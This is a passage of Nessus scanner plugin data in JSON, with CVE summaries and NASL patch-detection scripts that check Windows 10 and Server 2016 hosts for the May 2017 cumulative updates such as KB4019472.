as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"05_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4019473))\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:04", "description": "The remote Windows host is missing security update KB4019472. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows DNS server when it's configured to answer version queries. An unauthenticated, remote attacker can exploit this, via a malicious DNS query, to cause the DNS server to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Edge due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0221)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0171", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0221", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0230", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019472.NASL", "href": "https://www.tenable.com/plugins/nessus/100059", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100059);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0171\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0221\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0230\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98097,\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98147,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98222,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019472\");\n script_xref(name:\"MSFT\", value:\"MS17-4019472\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019472: Windows 10 Version 1607 and Windows Server 2016 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update KB4019472. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - A denial of service vulnerability exists in the Windows\n DNS server when it's configured to answer version\n queries. An unauthenticated, remote attacker can exploit\n this, via a malicious DNS query, to cause the DNS server\n to become nonresponsive. (CVE-2017-0171)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to visit a specially crafted\n website, to execute arbitrary code in the context of the\n current user. (CVE-2017-0221)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to execute\n arbitrary code in the context of the current user.\n (CVE-2017-0230)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019472/windows-10-update-kb4019472\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?038b505a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019472.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft \nbulletin = 'MS17-05';\nkbs = make_list(4019472);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# Update only applies to Window 10 1607 / Server 2016\nif (hotfix_check_sp_range(win10:'0') <= 0) \n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 10 1607 / Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:kbs)\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:22:30", "description": "The remote Windows 10 version 1703 host is missing security update KB4016871. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0224)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to 